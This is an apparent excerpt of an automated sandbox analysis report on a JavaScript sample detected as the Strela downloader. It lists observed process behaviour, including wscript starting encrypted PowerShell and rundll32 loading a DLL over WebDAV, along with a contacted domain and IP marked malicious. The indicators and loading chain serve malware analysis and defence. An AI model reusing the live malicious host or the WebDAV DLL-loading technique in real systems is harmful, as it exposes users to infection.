Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Opens network shares
Source: C:\Windows\System32\rundll32.exe File opened: \\apitestlabs.com@8888\davwwwroot\299841748728606.dll Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: \\apitestlabs.com@8888\davwwwroot\299841748728606.dll Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1544365 Sample: 1933725401135087429.js Startdate: 29/10/2024 Architecture: WINDOWS Score: 92 24 apitestlabs.com 2->24 26 Yara detected Strela Downloader 2->26 28 JavaScript source code contains functionality to generate code involving a shell, file or stream 2->28 30 Uses known network protocols on non-standard ports 2->30 32 2 other signatures 2->32 8 wscript.exe 1 1 2->8         started        signatures3 process4 signatures5 34 JScript performs obfuscated calls to suspicious functions 8->34 36 Wscript starts Powershell (via cmd or directly) 8->36 38 Encrypted powershell cmdline option found 8->38 40 2 other signatures 8->40 11 powershell.exe 7 8->11         started        process6 signatures7 42 Suspicious execution chain found 11->42 14 rundll32.exe 11->14         started        17 net.exe 1 11->17         started        20 conhost.exe 11->20         started        process8 dnsIp9 44 Opens network shares 14->44 22 apitestlabs.com 94.159.113.48, 49709, 8888 NETCOM-R-ASRU Russian Federation 17->22 signatures10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
94.159.113.48
 apitestlabs.com Russian Federation
49531 NETCOM-R-ASRU true

Contacted Domains

Name IP Active
apitestlabs.com 94.159.113.48 true